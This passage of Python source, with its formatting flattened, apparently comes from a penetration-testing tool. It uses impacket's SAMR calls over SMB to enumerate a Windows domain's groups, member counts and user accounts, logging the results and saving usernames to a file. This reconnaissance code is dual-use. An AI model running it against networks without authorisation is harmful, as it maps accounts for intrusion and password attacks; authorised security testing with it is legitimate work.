dce.disconnect() return if self.args.logs: ctime = datetime.now().strftime("%b.%d.%y_at_%H%M") log_name = 'Loggedon-Users_of_{}_on_{}.log'.format(self.host, ctime) write_log(str(enumlog), log_name) self.logger.announce("Saved Loggedon-Users output to {}/{}".format( cfg.LOGS_PATH, log_name)) #self.logger.announce('Finished checking for logged on users') dce.disconnect() return
def group1(smb): """Enum domain groups. Prints output and adds them to cmxdb """ self = smb if self.args.groups: targetGroup = self.args.groups groupFound = False groupLog = '' #self.logger.announce('Starting Domain Group Enum') try: rpctransport = impacket.dcerpc.v5.transport.SMBTransport( self.dc_ip, 445, r'\samr', username=self.username, password=self.password) #domain=self.domain dce = rpctransport.get_dce_rpc() dce.connect() try: logging.debug('Get net groups Binding start') dce.bind(impacket.dcerpc.v5.samr.MSRPC_UUID_SAMR) try: logging.debug('Connect w/ hSamrConnect...') resp = impacket.dcerpc.v5.samr.hSamrConnect(dce) logging.debug('Dump of hSamrConnect response:') if self.debug: resp.dump() serverHandle = resp['ServerHandle'] self.logger.debug('Looking up reachable domain(s)') resp2 = impacket.dcerpc.v5.samr.hSamrEnumerateDomainsInSamServer( dce, serverHandle) logging.debug( 'Dump of hSamrEnumerateDomainsInSamServer response:') if self.debug: resp2.dump() domains = resp2['Buffer']['Buffer'] tmpdomain = domains[0]['Name'] logging.debug('Looking up groups in domain: ' + domains[0]['Name']) resp = impacket.dcerpc.v5.samr.hSamrLookupDomainInSamServer( dce, serverHandle, domains[0]['Name']) logging.debug('Dump of hSamrLookupDomainInSamServer response:') if self.debug: resp.dump() resp = impacket.dcerpc.v5.samr.hSamrOpenDomain( dce, serverHandle=serverHandle, domainId=resp['DomainId']) logging.debug('Dump of hSamrOpenDomain response:') if self.debug: resp.dump() domainHandle = resp['DomainHandle'] status = impacket.nt_errors.STATUS_MORE_ENTRIES enumerationContext = 0 self.logger.success('Domain Groups enumerated') self.logger.highlight( " {} Domain Group Accounts".format(tmpdomain)) while status == impacket.nt_errors.STATUS_MORE_ENTRIES: try: resp = impacket.dcerpc.v5.samr.hSamrEnumerateGroupsInDomain( dce, domainHandle, enumerationContext=enumerationContext) logging.debug( 'Dump of hSamrEnumerateGroupsInDomain response:') if self.debug: resp.dump() except impacket.dcerpc.v5.rpcrt.DCERPCException as e: if str(e).find('STATUS_MORE_ENTRIES') < 0: raise resp = e.get_packet() for group in resp['Buffer']['Buffer']: gid = group['RelativeId'] r = impacket.dcerpc.v5.samr.hSamrOpenGroup( dce, domainHandle, groupId=gid) logging.debug('Dump of hSamrOpenUser response:') if self.debug: r.dump() info = impacket.dcerpc.v5.samr.hSamrQueryInformationGroup( dce, r['GroupHandle'], impacket.dcerpc.v5.samr. GROUP_INFORMATION_CLASS.GroupGeneralInformation) #info response object (SAMPR_GROUP_GENERAL_INFORMATION) defined in impacket/samr.py # 2.2.5.7 SAMPR_GROUP_INFO_BUFFER logging.debug( 'Dump of hSamrQueryInformationGroup response:') if self.debug: info.dump() #self.logger.results('Groupname: {:<30} membercount: {}'.format(group['Name'], info['Buffer']['General']['MemberCount'])) #print('') self.logger.highlight('{:<30} membercount: {}'.format( group['Name'], info['Buffer']['General']['MemberCount'])) groupLog += '{:<30} membercount: {}\n'.format( group['Name'], info['Buffer']['General']['MemberCount']) impacket.dcerpc.v5.samr.hSamrCloseHandle( dce, r['GroupHandle']) enumerationContext = resp['EnumerationContext'] status = resp['ErrorCode'] except Exception as e: #failed function logging.debug('failed function {}'.format(str(e))) self.logger.error('Failed to enum Domain Groups') dce.disconnect() return except Exception as e: #failed bind logging.debug('failed bind {}'.format(str(e))) dce.disconnect() return except Exception as e: #failed connect logging.debug('failed connect {}'.format(str(e))) dce.disconnect() return try: dce.disconnect() except: pass if self.args.logs: ctime = datetime.now().strftime("%b.%d.%y_at_%H%M") log_name = 'Domain_Groups_of_{}_on_{}.log'.format(tmpdomain, ctime) write_log(str(groupLog), log_name) self.logger.announce("Saved Group Members output to {}/{}".format( cfg.LOGS_PATH, log_name)) #self.logger.announce('Finished Domain Group Enum') return
def users1(smb): """Enum domain users.""" users = '' self = smb #self.logger.announce('Starting Domain Users Enum') if self.args.save: filename = "{}-users.txt".format(self.domain) savefile = open(filename, "w") try: rpctransport = impacket.dcerpc.v5.transport.SMBTransport( self.dc_ip, 445, r'\samr', username=self.username, password=self.password) #domain=self.domain dce = rpctransport.get_dce_rpc() dce.connect() try: logging.debug('NetUsers Binding start') dce.bind(impacket.dcerpc.v5.samr.MSRPC_UUID_SAMR) try: logging.debug('Connect w/ hSamrConnect...') resp = impacket.dcerpc.v5.samr.hSamrConnect(dce) logging.debug('Dump of hSamrConnect response:') if self.debug: resp.dump() serverHandle = resp['ServerHandle'] self.logger.debug('Looking up domain name(s)') resp2 = impacket.dcerpc.v5.samr.hSamrEnumerateDomainsInSamServer( dce, serverHandle) logging.debug( 'Dump of hSamrEnumerateDomainsInSamServer response:') if self.debug: resp2.dump() domains = resp2['Buffer']['Buffer'] tmpdomain = domains[0]['Name'] self.logger.debug('Looking up users in domain:' + domains[0]['Name']) resp = impacket.dcerpc.v5.samr.hSamrLookupDomainInSamServer( dce, serverHandle, domains[0]['Name']) logging.debug('Dump of hSamrLookupDomainInSamServer response:') if self.debug: resp.dump() resp = impacket.dcerpc.v5.samr.hSamrOpenDomain( dce, serverHandle=serverHandle, domainId=resp['DomainId']) logging.debug('Dump of hSamrOpenDomain response:') if self.debug: resp.dump() domainHandle = resp['DomainHandle'] status = impacket.nt_errors.STATUS_MORE_ENTRIES enumerationContext = 0 self.logger.success('Domain Users enumerated') self.logger.highlight( " {} Domain User Accounts".format(tmpdomain)) while status == impacket.nt_errors.STATUS_MORE_ENTRIES: try: resp = impacket.dcerpc.v5.samr.hSamrEnumerateUsersInDomain( dce, domainHandle, enumerationContext=enumerationContext) logging.debug( 'Dump of hSamrEnumerateUsersInDomain response:') if self.debug: resp.dump() except impacket.dcerpc.v5.rpcrt.DCERPCException as e: if str(e).find('STATUS_MORE_ENTRIES') < 0: raise resp = e.get_packet() for user in resp['Buffer']['Buffer']: r = impacket.dcerpc.v5.samr.hSamrOpenUser( dce, domainHandle, impacket.dcerpc.v5.samr.MAXIMUM_ALLOWED, user['RelativeId']) logging.debug('Dump of hSamrOpenUser response:') if self.debug: r.dump() # r has the clases defined here: #https://github.com/SecureAuthCorp/impacket/impacket/dcerpc/v5/samr.py #2.2.7.29 SAMPR_USER_INFO_BUFFER #self.logger.results('username: {:<25} rid: {}'.format(user['Name'], user['RelativeId'])) self.logger.highlight('{}\\{:<20} rid: {}'.format( tmpdomain, user['Name'], user['RelativeId'])) users += '{}\\{:<20} rid: {}\n'.format( tmpdomain, user['Name'], user['RelativeId']) self.db.add_user(self.domain, user['Name']) if self.args.save: savefile.write("{}\n".format(user['Name'])) info = impacket.dcerpc.v5.samr.hSamrQueryInformationUser2( dce, r['UserHandle'], impacket.dcerpc.v5.samr. USER_INFORMATION_CLASS.UserAllInformation) logging.debug( 'Dump of hSamrQueryInformationUser2 response:') if self.debug: info.dump() impacket.dcerpc.v5.samr.hSamrCloseHandle( dce, r['UserHandle']) enumerationContext = resp['EnumerationContext'] status = resp['ErrorCode'] except Exception as e: #failed function logging.debug('failed function {}'.format(str(e))) self.logger.error('Failed to enum Domain Users') dce.disconnect() return list() except Exception as e: #failed bind logging.debug('failed bind {}'.format(str(e))) dce.disconnect() return list() except Exception as e: #failed connect logging.debug('failed connect {}'.format(str(e))) dce.disconnect() return list() if self.args.save: savefile.close() self.logger.success("Usernames saved to: {}".format(filename)) try: dce.disconnect() except: self.logging.error('Failed dce disconnect during users') pass if self.args.logs: ctime = datetime.now().strftime("%b.%d.%y_at_%H%M") log_name = 'Domain_Users_of_{}_on_{}.log'.format(tmpdomain, ctime) write_log(str(users), log_name) self.logger.announce("Saved Domain Users output to {}/{}".format( cfg.LOGS_PATH, log_name)) #self.logger.announce('Finished Domain Users Enum') return